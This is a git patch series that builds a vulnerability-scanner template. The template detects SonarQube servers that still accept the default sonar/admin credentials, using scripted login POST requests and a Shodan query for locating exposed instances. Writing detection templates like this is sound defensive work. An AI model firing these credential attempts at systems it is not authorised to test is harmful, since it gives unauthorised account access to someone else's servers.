From a5e06fd3802a1d9f9d0ba2928050a0ae47bb68e0 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Tue, 11 Jul 2023 17:34:55 -0400 Subject: [PATCH 1/4] Add files via upload This template checks if Sonarqube assets take in default credentials --- .../sonarqube-default-credentials.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/sonarqube-default-credentials.yaml diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml new file mode 100644 index 0000000000..81d1debd65 --- /dev/null +++ b/http/misconfiguration/sonarqube-default-credentials.yaml @@ -0,0 +1,32 @@ +id: sonarqube-default-credential +info: + name: Sonarqube Default Credential Login + author: Ep1cSage + severity: critical + description: description + reference: + - https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin + tags: sonarqube + +requests: + - raw: + - |- + POST /api/authentication/login HTTP/1.1 + Host: {{Hostname}} + Referer: http://{{Hostname}}:9000/sessions/new + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}}:9000 + + {{credentials}} + + attack: batteringram + payloads: + credentials: + - login=sonar&password=sonar + - login=admin&password=admin + + matchers: + - type: word + part: header + words: + - HTTP/1.1 200 From 20803cbf4bdbcf15a2113a334b60a7eee6f73a71 Mon Sep 17 00:00:00 2001 From: dcruzec Date: Tue, 11 Jul 2023 17:39:23 -0400 Subject: [PATCH 2/4] Update sonarqube-default-credentials.yaml --- http/misconfiguration/sonarqube-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml index 81d1debd65..f3bc20a766 100644 --- a/http/misconfiguration/sonarqube-default-credentials.yaml +++ b/http/misconfiguration/sonarqube-default-credentials.yaml @@ -13,9 +13,9 @@ requests: - |- POST /api/authentication/login HTTP/1.1 Host: {{Hostname}} - Referer: http://{{Hostname}}:9000/sessions/new + Referer: http://{{Hostname}}/sessions/new Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}}:9000 + Origin: http://{{Hostname}} {{credentials}} From 1c999a0b92cc0cc632e3c9ac67a353853ae07224 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 12 Jul 2023 09:27:52 +0530 Subject: [PATCH 3/4] updated req,matcher,info --- .../sonarqube-default-credentials.yaml | 57 ++++++++++++------- 1 file changed, 35 insertions(+), 22 deletions(-) diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/misconfiguration/sonarqube-default-credentials.yaml index f3bc20a766..1a8e033d59 100644 --- a/http/misconfiguration/sonarqube-default-credentials.yaml +++ b/http/misconfiguration/sonarqube-default-credentials.yaml @@ -1,32 +1,45 @@ -id: sonarqube-default-credential +id: sonarqube-default-login + info: - name: Sonarqube Default Credential Login + name: SonarQube Default Login - Detect author: Ep1cSage - severity: critical - description: description - reference: + severity: high + description: | + SonarQube contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: - https://docs.sonarsource.com/sonarqube/9.6/instance-administration/security/#:~:text=When%20installing%20SonarQube%2C%20a%20default,Password%3A%20admin - tags: sonarqube - -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 4 + verified: true + shodan-query: title:"Sonarqube" + tags: default-login,sonarqube + +http: - raw: - - |- + - | POST /api/authentication/login HTTP/1.1 Host: {{Hostname}} - Referer: http://{{Hostname}}/sessions/new Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - {{credentials}} - - attack: batteringram + login={{username}}&password={{password}} + + attack: clusterbomb payloads: - credentials: - - login=sonar&password=sonar - - login=admin&password=admin - + username: + - sonar + - admin + password: + - sonar + - admin + matchers: - - type: word - part: header - words: - - HTTP/1.1 200 + - type: dsl + dsl: + - 'status_code == 200' + - 'len(body) == 0' + - 'contains(set_cookie, "JWT-SESSION=")' + condition: and From ae5c9fe556b08d88ab20aa0901e4fd47b0607fa0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 12 Jul 2023 10:35:52 +0530 Subject: [PATCH 4/4] Rename http/misconfiguration/sonarqube-default-credentials.yaml to http/default-logins/sonarqube/sonarqube-default-login.yaml --- .../sonarqube/sonarqube-default-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{misconfiguration/sonarqube-default-credentials.yaml => default-logins/sonarqube/sonarqube-default-login.yaml} (100%) diff --git a/http/misconfiguration/sonarqube-default-credentials.yaml b/http/default-logins/sonarqube/sonarqube-default-login.yaml similarity index 100% rename from http/misconfiguration/sonarqube-default-credentials.yaml rename to http/default-logins/sonarqube/sonarqube-default-login.yaml